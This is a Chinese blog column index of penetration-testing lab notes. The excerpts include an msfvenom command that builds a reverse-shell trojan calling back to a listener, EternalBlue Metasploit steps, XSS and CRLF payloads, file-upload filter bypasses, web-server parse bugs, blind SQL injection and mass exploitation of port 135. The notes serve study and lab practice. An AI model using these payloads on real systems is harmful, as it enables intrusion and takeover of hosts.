
渗透
渗透
lnterpreter
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
msf反弹shell
文章目录一、生成木马二、执行监听三、上传并执行木马一、生成木马msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.159.128 lport=4444 -f exe -o /tmp/hack.exe这里我们为生成的木马指定了payload为:windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.159.128,监听端口为4444,文件输出格式为exe并保存到路径/tmp/hack.exe原创 2020-08-14 09:34:08 · 765 阅读 · 0 评论 -
UDF
文章目录一、收集信息二、MySQL版本高于5.1,创建文件夹四.执行命令五.清除痕迹一、收集信息查看网站配置文件获取数据库的账号和密码(此处演示是mysql数据库)数据库配置文件:conn、config、data、sql、common 、inc等数据库目录文件:安装目录/data/mysql/user.myd和user.frm(user.myd是mysql数据库中user表中内容,user,frm是user表中的列名)select version();原创 2020-08-12 12:33:44 · 392 阅读 · 0 评论 -
EIP
JMP指令CALL指令RET指令原创 2020-07-25 19:04:17 · 578 阅读 · 0 评论 -
堆栈
原创 2020-07-24 23:06:37 · 179 阅读 · 0 评论 -
xss
1、常见xss <script>alert("1")</script>2、过滤了就采取双写绕过3、过滤了我们可以用<img src='w' onerror='alert("1")'>,我们指定的图片地址根本不在也就是说一定会发生错误,这时候onerror里面的代码自然就会得到执行常用的代码标签:<a onmousemove='1'>当用户鼠标移动时即可运行代码<div onmousemove='1'>当用户在这块上面运行时,即可运原创 2020-07-21 18:34:52 · 250 阅读 · 0 评论 -
谷歌插件
一、switchysharp二、wappalyzer三、ModHeader原创 2020-07-14 22:25:06 · 182 阅读 · 0 评论 -
绕cdn寻找真实ip
一、多地ping1、17ce.com(国内)2、asm.ca.com(国外)二、扫子域名寻找真实ip三、查询历史域名解析记录1、site.ip138.com2、viewdns.info3、x.threatbook.cn四、phpinfo.php原创 2020-07-14 22:13:44 · 216 阅读 · 0 评论 -
135批量抓鸡
1、主机发现2、135端口弱口令扫描3、本地搭建ftp服务4、批量溢出原创 2020-07-09 09:53:17 · 1666 阅读 · 0 评论 -
UAC
windows提权:传统提权:1、拿到web shell后,上传大马,上传cmd2、看是否有足够的权限3、有权限,直接添加账户4、没有权限,用msf生成一个反弹的shell.exe,用上传的cmd执行shell.exe产生一个会话进行提权数据库提权():1、通过信息搜集获取服务器的数据库类型(这里用mysql数据库进行提权)2、查看网站配置文件获取数据库的账号和密码(此处演示是mysql数据库)数据库配置文件:conn、config、data、sql、common 、inc等数据库目录文原创 2020-07-08 23:56:57 · 303 阅读 · 0 评论 -
远程代码执行
1、 漏洞简介及成因Tomcat 运行在Windows 主机上,且启用了 HTTP PUT 请求方法,可通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件,造成任意代码执行。影响版本: Apache Tomcat 7.0.0 – 7.0.812、 漏洞复现配置漏洞,开启put方法可上传文件功能。tomcat文件夹下的/conf/web.xml文件插入:<init-param> <param-name>readonly</param-n原创 2020-07-06 19:56:16 · 2907 阅读 · 0 评论 -
目录穿越
1、 漏洞简介及成因Nginx反向代理,静态文件存储在/home/下,而访问时需要在url中输入files,配置文件中/files没有用/闭合,导致可以穿越至上层目录。2、 漏洞复现访问:http://192.168.139.128:8081/files/访问:http://192.168.139.128:8081/files…/成功实现目录穿越:3、 漏洞修复Nginx的配置文件/etc/nginx/conf.d/error2.conf的/files使用/闭合。...原创 2020-07-06 19:49:02 · 5073 阅读 · 0 评论 -
CRLF注入
1、 漏洞简介及成因CRLF时“回车+换行”(\r\n)的简称。HTTP Header与HTTP Body时用两个CRLF分隔的,浏览器根据两个CRLF来取出HTTP内容并显示出来。通过控制HTTP消息头中的字符,注入一些恶意的换行,就能注入一些会话cookie或者html代码,由于Nginx配置不正确,导致注入的代码会被执行。2、 漏洞复现访问页面,抓包请求加上/%0d%0a%0d%0a<img src=1 onerror=alert(/xss/)>由于页面重定向,并没有弹窗。原创 2020-07-06 19:43:32 · 629 阅读 · 0 评论 -
解析漏洞
1、 漏洞介绍及成因对任意文件名,在后面添加/任意文件名.php的解析漏洞,比如原本文件名是test.jpg,可以添加test.jpg/x.php进行解析攻击。2、 漏洞复现在网站根目录下新建一个i.gif的文件,在里面写入phpinfo()在浏览器中打开利用文件解析漏洞,输入192.168.139.129:100/i.gif.2.php,发现无法解析将/etc/php5/fpm/pool.d/www.conf中security.limit_extensions = .php中的.php删除再原创 2020-07-06 18:01:44 · 187 阅读 · 0 评论 -
解析漏洞
1、 漏洞介绍及成因Apache文件解析漏洞与用户的配置有密切关系,严格来说属于用户配置问题。Apache文件解析漏洞涉及到一个解析文件的特性:Apache默认一个文件可以有多个以点分隔的后缀,当右边的后缀无法识别(不在mime.tyoes内),则继续向左识别,当我们请求这样一个文件:shell.xxx.yyyyyy->无法识别,向左xxx->无法识别,向左 php->发现后缀是php,交给php处理这个文件2、 漏洞复现上传一个后缀名为360的php文件3、 漏洞原创 2020-07-06 17:53:15 · 202 阅读 · 0 评论 -
解析漏洞
1、 漏洞介绍及成因IIS 6.0 在处理含有特殊符号的文件路径时会出现逻辑错误,从而造成文件解析漏洞。这一漏洞有两种完全不同的利用方式:/test.asp/test.jpgtest.asp;.jpg2、漏洞复现利用方式 1第一种是新建一个名为 “test.asp” 的目录,该目录中的任何文件都被 IIS 当作 asp 程序执行(特殊符号是 “/” ) 利用方式 2第二种是上传名为 “test.asp;.jpg” 的文件,虽然该文件真正的后缀名是 “.jpg”, 但由于含有特殊符原创 2020-07-06 17:47:06 · 173 阅读 · 0 评论 -
远程代码执行
1、 漏洞介绍及成因在IIS6.0处理PROPFIND指令的时候,由于对url的长度没有进行有效的长度控制和检查,导致执行memcpy对虚拟路径进行构造的时候,引发栈溢出,从而导致远程代码执行。2、 漏洞复现1)漏洞环境搭建在windows server 2003 r2 32位上安装iis6.02) 触发漏洞 网上下载poc3、 漏洞修复1)关闭 WebDAV 服务2) 使用相关防护设备...原创 2020-07-06 17:39:48 · 192 阅读 · 0 评论 -
短文件名猜解
1、漏洞介绍及成因IIS的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。2、漏洞复现1)、在网站根目录下添加aaaaaaaaaa.html文件 3) 进行猜解 3、漏洞修复修复方法:1)升级.net framework2)修改注册表禁用短文件名功能快捷键Win+R打开命令窗口,输入regedit打开注册表窗口,找到路径:HKEY_LOCAL_MACHINE\SYSTEM\CurrentC原创 2020-07-06 17:29:18 · 600 阅读 · 0 评论 -
put漏洞
PUT漏洞1、漏洞介绍及成因IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,造成任意文件上传。版本: IIS6.02、漏洞复现1) 开启WebDAV 和写权限 2)利用工具进行测试 成功上传,再上传一句话木马,然后用菜刀连接,getshell 3、漏洞修复关闭WebDAV 和写权限...原创 2020-07-06 17:20:23 · 1614 阅读 · 0 评论 -
代码审计流程
准备工作:漏洞产生;函数 可控变量如:sql注入函数关键字:mysql_connect mysql_select_db等可控变量:$_GET $_POST 等定点漏洞挖掘:分析漏洞产生的条件得到漏洞关键字3)利用工具找到关键字4)分析文件名进行判断筛选5)对文件进行代码分析 跟踪变量6)确定是否存在漏洞...原创 2020-05-04 12:19:57 · 802 阅读 · 0 评论 -
sql-2数字型
<?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_GET['id'])){$id=$_GET['id'];//logging the conn...原创 2020-04-28 17:56:09 · 206 阅读 · 0 评论 -
sql字符型型
部分源码如下:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your...原创 2020-04-28 17:41:58 · 1145 阅读 · 1 评论 -
宽字节sql
什么是宽字节1)GB2312 , GBK ,GB18030等都是常说的宽字节,实际为两字节(所有英文占一个字节,中文占两个字节)宽字节如何产生的如何验证是否存在如何避免宽字节注入1)用utf-8,避免宽字节注入2)mysql_real_escape_string , mysql_set_charset(‘gbk’,$conn)3) 可以设置参数,character_set_...原创 2020-04-26 17:30:01 · 362 阅读 · 0 评论 -
python-盲注
import requestsimport time#目标urlurl = 'http://192.168.8.152/sql/Less-1/?id=1'#查库语句database = 'select schema_name from information_schema.schemata'#查当前表语句table = 'select table_name from infor...原创 2020-04-22 14:23:10 · 443 阅读 · 0 评论 -
数据库mysql基操
1)mysql> select system_user(); #返回系统用户名2)mysql> select user(); #返回数据库用户名3)mysql> select current_user(); #返回当前用户名4)mysql> select database(); #返回当前数据库(前提是你要先进入一个数据库)5)mysql&g...原创 2020-04-18 17:14:38 · 298 阅读 · 0 评论 -
OSI与TCP/IP协议簇
OSI与TCP/IP协议簇:分层思想:• 将复杂的流程分解为几个功能相对单一的子过程– 整个流程更加清晰,复杂问题简单化– 更容易发现问题并针对性的解决问题OSI七层模型:•同层使用相同协议,下层为上层提供服务(每层都有协议)TCP/IP 5层协议簇/协议栈•应用层(表示层和会话层因为协议太少,被应用层合并了)•传输层•网络层•数据链路层•物理层数据封装:•应用...原创 2020-04-17 23:40:20 · 368 阅读 · 0 评论 -
445端口
1.首先打开msf2.搜索永恒之蓝(search ms17_010)3.进入永恒之蓝exp放位置(use exploit/windows/smb/ms17_010_eternalblue)4.配置攻击载荷(set payload windows/x64/meterpreter/reverse_tcp)5.配置被攻击的服务器IP,和本机的IP(set RHOSTS 192.168.8...原创 2020-04-04 22:00:54 · 524 阅读 · 0 评论 -
DNS功能
1、DNSDomain Name Service域名服务作用:为客户机提供域名解析服务器2、域名组成2.1、域名组成概述如"www.sina.com.cn"是一个域名,从严格意义上讲,"sina.com.cn"才被称为域名(全球唯一),而"www"是主机名。"主机名.域名"称为完全限定域名(FQDN)。一个域名下可以有多个主机,域名全球唯一,那么"主机名.域名"肯定也是全球唯一的...原创 2020-04-02 13:21:25 · 764 阅读 · 0 评论 -
23,3389端口
1.概述2.步骤3.打开服务器的远程管理4.添加一个账号,然后将他添加到远程登录组里面5.客户端使用mstsc命令远程连接服务器(因为我先前连接过了,所以这里不需要输入用户密码了),在服务器上创建了一个记事本5.登陆成功了6.上面的是图形界面登录,下面用命令行模式登录,首先打开Telnet服务再用services.msc命令打开服务窗口,操作如下图将框住的服务调...原创 2020-04-01 13:28:33 · 457 阅读 · 0 评论 -
用户组概述
1.用户组2.账户分类3.用户组管理命令原创 2020-04-01 11:05:03 · 308 阅读 · 0 评论 -
虚拟机部署
1.打开虚拟机,点击创建2.微软用典型,linux用自定义,下一步3.默认下一步4.选择你的镜像文件对应版本,然后下一步5.自己定义虚拟机名字和安装目录6.单个文件方便管理(建议使用),下一步7.点完成8.点击编辑9.将你的镜像文件添加进来(网络适配器自己配置,图方便的话就用桥接)10.然后点击开去虚拟机进行安装11.一直默认下一步就行了...原创 2020-04-01 10:59:40 · 362 阅读 · 0 评论 -
登陆前端绕过
1.输入一个正确的账号,密码随便输2.查看返回包,看到这个很高兴,因为密码是错误的,所以我猜0是错误的,我们把它修改为13.跳到首页但是没登陆成功4.然后用正确的密码登录,抓包,返回包多了 一个Set-Cookie,存在用户id,状态码为1,类容长度为30,然后放行5.登录成功6.在用错误的密码登陆时,伪造返回包就可以绕过验证直接登录...原创 2020-03-31 17:22:16 · 3635 阅读 · 1 评论 -
任意用户注册
1.注册页面随便填(电话号码最好11位,前端js验证),然后抓包,点击免费获取验证码,2.返回包中存在判断,下图是验证码错误的时候3.将状态值改为1,此时手机验证码已经发送出去了4.这时候,手机验证码随便填4位数(不要问我为啥,因为用我自己的手机试过了),发送出去的包里面,只存在3个数据(手机号,手机短信验证码,密码)5.将包发送到intruder中去(ctrl+i),将验证码...原创 2020-03-31 00:06:59 · 2553 阅读 · 1 评论 -
上传绕过 十二
分析源码看到是白名单判断,但是$img_path直接拼接,这次的save_path是通过post传进来的,还是利用00截断,但这次需要在二进制中进行修改,因为post不会像get对%00进行自动解码。成功绕过...原创 2020-03-26 19:31:13 · 122 阅读 · 0 评论 -
上传绕过 十一
分析源码查看代码,看到是白名单判断,但是$img_path直接拼接,因此可以利用%00截断绕过:成功绕过原创 2020-03-26 19:17:51 · 133 阅读 · 0 评论 -
上传绕过 十
分析源码这里我们可以看到如果匹配到黑名单的后缀名,将文件名替换为空,我们可以采用双写绕过:1.pphphp成功绕过原创 2020-03-26 13:38:52 · 151 阅读 · 0 评论 -
上传绕过 九
分析源码黑名单过滤,注意第15行和之前不太一样,路径拼接的是处理后的文件名,于是构造phpinfo.php. .(点+空格+点),经过处理后,文件名变成phpinfo.php.,即可绕过。成功绕过...原创 2020-03-26 13:25:35 · 170 阅读 · 0 评论 -
上传绕过 八
分析源码查看源代码,还是黑名单,但是没有对后缀名进行去”::DATA”处理,利用windows特性,可在后缀名中加”::DATA”处理,利用windows特性,可在后缀名中加” ::DATA”处理,利用windows特性,可在后缀名中加”::DATA”绕过:成功绕过...原创 2020-03-26 12:25:27 · 122 阅读 · 0 评论 -
上传绕过 七
分析源码查看源码还是黑名单没有对后缀名进行去.操作利用Windows特性会自动去掉后缀名中最后的.可在后缀名中加 . 绕过。成功绕过原创 2020-03-26 12:07:23 · 89 阅读 · 0 评论 -
上传绕过 六
分析源码还是黑名单,查看源码发现没有对首尾去除空格,所以我们在后缀上加上一个空格进行绕过黑名单。成功绕过原创 2020-03-26 11:59:35 · 105 阅读 · 0 评论 -
上传绕过 五
分析源码查看源代码发现没有做大小写判断,使用大小写绕过。上传phpinfo.PHp成功绕过原创 2020-03-26 11:51:04 · 171 阅读 · 0 评论